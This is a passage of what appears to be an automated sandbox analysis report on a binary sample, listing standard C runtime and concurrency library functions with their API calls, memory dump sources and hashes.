                                                                                    • Instruction ID: 3c4a00c01101e3417d492a63c26e06d94b1efbede92b5aee1480a2ddfdefe69c
                                                                                    • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                    • Instruction Fuzzy Hash: A3618D71A00715DFDB18CFA5E8926EEB7B1FB84316F24806ED45697252C738A981CF4C
                                                                                    Function 009F53C5 Relevance: 15.2, APIs: 10, Instructions: 175COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 009F54D0
                                                                                      • Part of subcall function 009F4EE1: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 009F4EF5
                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 009F54F9
                                                                                      • Part of subcall function 009F335B: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 009F3377
                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 009F5520
                                                                                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 009F53DA
                                                                                      • Part of subcall function 009F33BF: __EH_prolog3_GS.LIBCMT ref: 009F33C6
                                                                                      • Part of subcall function 009F33BF: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 009F33D5
                                                                                      • Part of subcall function 009F33BF: GetProcessAffinityMask.KERNEL32(00000000), ref: 009F33DC
                                                                                      • Part of subcall function 009F33BF: GetCurrentThread.KERNEL32 ref: 009F3404
                                                                                      • Part of subcall function 009F33BF: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 009F340E
                                                                                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 009F53FB
                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 009F5432
                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 009F5475
                                                                                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 009F5568
                                                                                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 009F558C
                                                                                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 009F5599
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                                                    • String ID:
                                                                                    • API String ID: 64082781-0
                                                                                    • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                    • Instruction ID: f173b7ab4b73c91430804e78a2c9f5e646306a1c20d8a5473980d10e5f7b4050
                                                                                    • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                    • Instruction Fuzzy Hash: FF61AB71A00B199FCB18CFA4E8D267DB7B6FF84312F25803DE24697652C735AA80CB44
                                                                                    Function 00431E06 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00431E1A
                                                                                      • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                      • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                    • _free.LIBCMT ref: 00431E26
                                                                                    • _free.LIBCMT ref: 00431E31
                                                                                    • _free.LIBCMT ref: 00431E3C
                                                                                    • _free.LIBCMT ref: 00431E47
                                                                                    • _free.LIBCMT ref: 00431E52
                                                                                    • _free.LIBCMT ref: 00431E5D
                                                                                    • _free.LIBCMT ref: 00431E68
                                                                                    • _free.LIBCMT ref: 00431E73
                                                                                    • _free.LIBCMT ref: 00431E81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                    • Instruction ID: 37ceee84360c9df2d19b7be330e975e9230a82d8295317da332a0d8bba7d8220
                                                                                    • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                    • Instruction Fuzzy Hash: 9111A476100508AFCB02EF56C852CD93BA5EF18355F1190AAFA088F232DA76EF519F84
                                                                                    Function 00A1206D Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00A12081
                                                                                      • Part of subcall function 00A136F1: HeapFree.KERNEL32(00000000,00000000,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?), ref: 00A13707
                                                                                      • Part of subcall function 00A136F1: GetLastError.KERNEL32(?,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?,?), ref: 00A13719
                                                                                    • _free.LIBCMT ref: 00A1208D
                                                                                    • _free.LIBCMT ref: 00A12098
                                                                                    • _free.LIBCMT ref: 00A120A3
                                                                                    • _free.LIBCMT ref: 00A120AE
                                                                                    • _free.LIBCMT ref: 00A120B9
                                                                                    • _free.LIBCMT ref: 00A120C4
                                                                                    • _free.LIBCMT ref: 00A120CF
                                                                                    • _free.LIBCMT ref: 00A120DA
                                                                                    • _free.LIBCMT ref: 00A120E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                    • Instruction ID: 4a660dad870c535adb18f6bb8cd26389c64ca210e2fff23e2c343a6b1e28f296
                                                                                    • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                    • Instruction Fuzzy Hash: B6116376510148FFCF01EF58CA62DDE3BA9EF05390B5145A5FA188F222DA31DFA09B80
                                                                                    Function 0042E1D2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: __cftoe
                                                                                    • String ID: f(@$f(@
                                                                                    • API String ID: 4189289331-2391611762
                                                                                    • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                    • Instruction ID: 3bb8b72b3fcb016b6809a9d2676edbb9e39e2dfdcc2cff5661f77b8cf8a8e7b7
                                                                                    • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                    • Instruction Fuzzy Hash: 8F511B32600215EBDB249B5BAC41EAF77ADEF49325F90425FF815D6282DB3DD900867C
                                                                                    Function 004286F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 0042871B
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00428723
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004287B1
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004287DC
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00428831
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: 11@$@fB$csm
                                                                                    • API String ID: 1170836740-1464837749
                                                                                    • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                    • Instruction ID: 85514cbf9916709cbd5a6cdf55cb31cf47df2c82886cb460035ca25a3a5e93b8
                                                                                    • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                    • Instruction Fuzzy Hash: E6411634B012289BCF00DF29DC41A9E7BB1AF80328F64815FE8146B392DB399D11CB99
                                                                                    Function 00A04AD4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00A04AED
                                                                                      • Part of subcall function 00A04DBC: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00A04820), ref: 00A04DCC
                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00A04B02
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A04B11
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00A04B1F
                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 00A04B95
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A04BD5
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00A04BE3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                    • String ID: 11@
                                                                                    • API String ID: 3151764488-1785270423
                                                                                    • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                                                    • Instruction ID: ab1f7d1fb96df500de16d87aff671d70eb147ef2b1ecb9ac71803dbb20b6e599
                                                                                    • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                                                    • Instruction Fuzzy Hash: 7D31F775A002189BCF04EF68E981B7D73B5FF49310F2485A9EA11972D2DBB0EE05C794
                                                                                    Function 00A131B0 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                    • Instruction ID: 9b7e7b677367546f13edf69f8dc230a6956ffb7c380217e24d57676d23da99a0
                                                                                    • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                    • Instruction Fuzzy Hash: BAC12572E04349AFDF12DFA8D841BEEBFB5AF0A311F144198E454A7392D7309A81CB65
                                                                                    Function 00430EE2 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • _memcmp.LIBVCRUNTIME ref: 0043118C
                                                                                    • _free.LIBCMT ref: 004311FD
                                                                                    • _free.LIBCMT ref: 00431216
                                                                                    • _free.LIBCMT ref: 00431248
                                                                                    • _free.LIBCMT ref: 00431251
                                                                                    • _free.LIBCMT ref: 0043125D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorLast$_memcmp
                                                                                    • String ID: 11@
                                                                                    • API String ID: 4275183328-1785270423
                                                                                    • Opcode ID: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                                                    • Instruction ID: ce7b668dfa5c2bb7c4e9a3ceca6e831dbf532e5f0ec0879f8663b0dec614f287
                                                                                    • Opcode Fuzzy Hash: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                                                    • Instruction Fuzzy Hash: ABB13975A016199FDB24DF18C894AAEB7B4FF08304F1086EEE949A7360D775AE90CF44
                                                                                    Function 00A11149 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 266COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                    • _free.LIBCMT ref: 00A11464
                                                                                    • _free.LIBCMT ref: 00A1147D
                                                                                    • _free.LIBCMT ref: 00A114AF
                                                                                    • _free.LIBCMT ref: 00A114B8
                                                                                    • _free.LIBCMT ref: 00A114C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorLast
                                                                                    • String ID: 11@$C
                                                                                    • API String ID: 3291180501-2085848483
                                                                                    • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                    • Instruction ID: 286d678dffb96dc4e18262db2049816b5d7f2ff364a01314cf95828ca51c7645
                                                                                    • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                    • Instruction Fuzzy Hash: 56B13675A01619DFDB24DF18C884AEDB7B4FB48704F1486AAEA49A7350E730AED0CF40
                                                                                    Function 00A0304B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 00A03071
                                                                                      • Part of subcall function 009F8AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 009F8ADD
                                                                                    • SafeSQueue.LIBCONCRT ref: 00A0308A
                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 00A0314A
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A0316B
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00A03179
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                    • String ID: 11@
                                                                                    • API String ID: 3496964030-1785270423
                                                                                    • Opcode ID: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                                                    • Instruction ID: 721f80457504fc51ff3f816522a772a5b2e9595ca52a0aa0e53ebded91180565
                                                                                    • Opcode Fuzzy Hash: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                                                    • Instruction Fuzzy Hash: 67311332601A199FCF25EF65D841B6ABBB8FF44710F104569E91A8B292DB70EE45CBC0
                                                                                    Function 009FC6E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • atomic_compare_exchange.LIBCONCRT ref: 009FC6FC
                                                                                    • atomic_compare_exchange.LIBCONCRT ref: 009FC720
                                                                                    • std::_Cnd_initX.LIBCPMT ref: 009FC731
                                                                                    • std::_Cnd_initX.LIBCPMT ref: 009FC73F
                                                                                      • Part of subcall function 009E1370: __Mtx_unlock.LIBCPMT ref: 009E1377
                                                                                    • std::_Cnd_initX.LIBCPMT ref: 009FC74F
                                                                                      • Part of subcall function 009FC40F: __Cnd_broadcast.LIBCPMT ref: 009FC416
                                                                                    • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 009FC75D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                    • String ID: 11@
                                                                                    • API String ID: 4258476935-1785270423
                                                                                    • Opcode ID: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                                                    • Instruction ID: b3fd89255aaf26567531c3374792e97c0c22f65180a8bfec640cd1f605b1933b
                                                                                    • Opcode Fuzzy Hash: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                                                    • Instruction Fuzzy Hash: A80126B190060DA7DB11BB60CE46BBDB35DAF80310F144011FA0097282EB78EB05CBD1
                                                                                    Function 0040C63D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 37COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C69C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw
                                                                                    • String ID: :3@$f(@$f(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                    • API String ID: 2005118841-316725708
                                                                                    • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                                                    • Instruction ID: d382e3a4140bff2bd7f1e847cb7cd930782ec9a0d5dc38d66c16a87299b4fd47
                                                                                    • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                                                    • Instruction Fuzzy Hash: 8BF0FC72900208AAC714DB54DC82BAB33589B15305F14857BED41BA1C2EA7DAD05C79C
                                                                                    Function 00432154 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D958,0042D958,?,?,?,004323A5,00000001,00000001,23E85006), ref: 004321AE
                                                                                    • __alloca_probe_16.LIBCMT ref: 004321E6
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004323A5,00000001,00000001,23E85006,?,?,?), ref: 00432234
                                                                                    • __alloca_probe_16.LIBCMT ref: 004322CB
                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043232E
                                                                                    • __freea.LIBCMT ref: 0043233B
                                                                                      • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                                                    • __freea.LIBCMT ref: 00432344
                                                                                    • __freea.LIBCMT ref: 00432369
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3864826663-0
                                                                                    • Opcode ID: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                                                    • Instruction ID: a5f38111fa01d07f603b669534a8c8f44d85fc048aacd33138e2e818ffff9497
                                                                                    • Opcode Fuzzy Hash: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                                                    • Instruction Fuzzy Hash: B8513672600606AFDB258F75CD81EBF37A9EB48754F24426AFD04E6250DBBCDC40C658
                                                                                    Function 00439ECE Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                    • Instruction ID: 1cba7b180e09f8073ff63dd7a5e39a9331c2ed4ff1a144fb7a18fbb91be6d7aa
                                                                                    • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                    • Instruction Fuzzy Hash: 0761F071900205AFDB24DF69C842B9ABBF4EF09710F10516BE884EB382E7799E418B59
                                                                                    Function 00A1A135 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                    • Instruction ID: b8ca6df24b49fd9a241c430a954b17ba2e0a92863ef61aa6f8b45e71b4c12343
                                                                                    • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                    • Instruction Fuzzy Hash: 0361F136D01205AFDB20CF68C942BDEBBF4EF15710F2441AAE854EB351D7719D818B51
                                                                                    Function 004338A3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetConsoleCP.KERNEL32(?,0042C25D,E0830C40,?,?,?,?,?,?,00434018,0040DDFA,0042C25D,?,0042C25D,0042C25D,0040DDFA), ref: 004338E5
                                                                                    • __fassign.LIBCMT ref: 00433960
                                                                                    • __fassign.LIBCMT ref: 0043397B
                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,0042C25D,00000001,?,00000005,00000000,00000000), ref: 004339A1
                                                                                    • WriteFile.KERNEL32(?,?,00000000,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339C0
                                                                                    • WriteFile.KERNEL32(?,0040DDFA,00000001,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1324828854-0
                                                                                    • Opcode ID: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                                                    • Instruction ID: 3302cc5d055cfa7cb2d102f804d659735755d65fc8cb0b0a8ea62d8a9f37e22e
                                                                                    • Opcode Fuzzy Hash: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                                                    • Instruction Fuzzy Hash: 1E51B3B09002499FCB10DFA8D845BEEBBF4EF09701F14412BE556E7391E7349A51CB69
                                                                                    Function 00A13B0A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetConsoleCP.KERNEL32(?,00A0C4C4,E0830C40,?,?,?,?,?,?,00A1427F,009EE061,00A0C4C4,?,00A0C4C4,00A0C4C4,009EE061), ref: 00A13B4C
                                                                                    • __fassign.LIBCMT ref: 00A13BC7
                                                                                    • __fassign.LIBCMT ref: 00A13BE2
                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00A0C4C4,00000001,?,00000005,00000000,00000000), ref: 00A13C08
                                                                                    • WriteFile.KERNEL32(?,?,00000000,00A1427F,00000000,?,?,?,?,?,?,?,?,?,00A1427F,009EE061), ref: 00A13C27
                                                                                    • WriteFile.KERNEL32(?,009EE061,00000001,00A1427F,00000000,?,?,?,?,?,?,?,?,?,00A1427F,009EE061), ref: 00A13C60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1324828854-0
                                                                                    • Opcode ID: c9ec468ed5257d0217e44f77c4afa4e16cabb00b598963834898839e2c0f3bac
                                                                                    • Instruction ID: ddf9fba571f23d2d6887fadc2904fee94c0a53f93552895037dfa1d6a9453d21
                                                                                    • Opcode Fuzzy Hash: c9ec468ed5257d0217e44f77c4afa4e16cabb00b598963834898839e2c0f3bac
                                                                                    • Instruction Fuzzy Hash: 0951D675D00209AFDF10CFA9D885AEEBBF4EF49700F14412AE555F7291E7309A85CBA4
                                                                                    Function 009FB14D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _SpinWait.LIBCONCRT ref: 009FB172
                                                                                      • Part of subcall function 009F11A8: _SpinWait.LIBCONCRT ref: 009F11C0
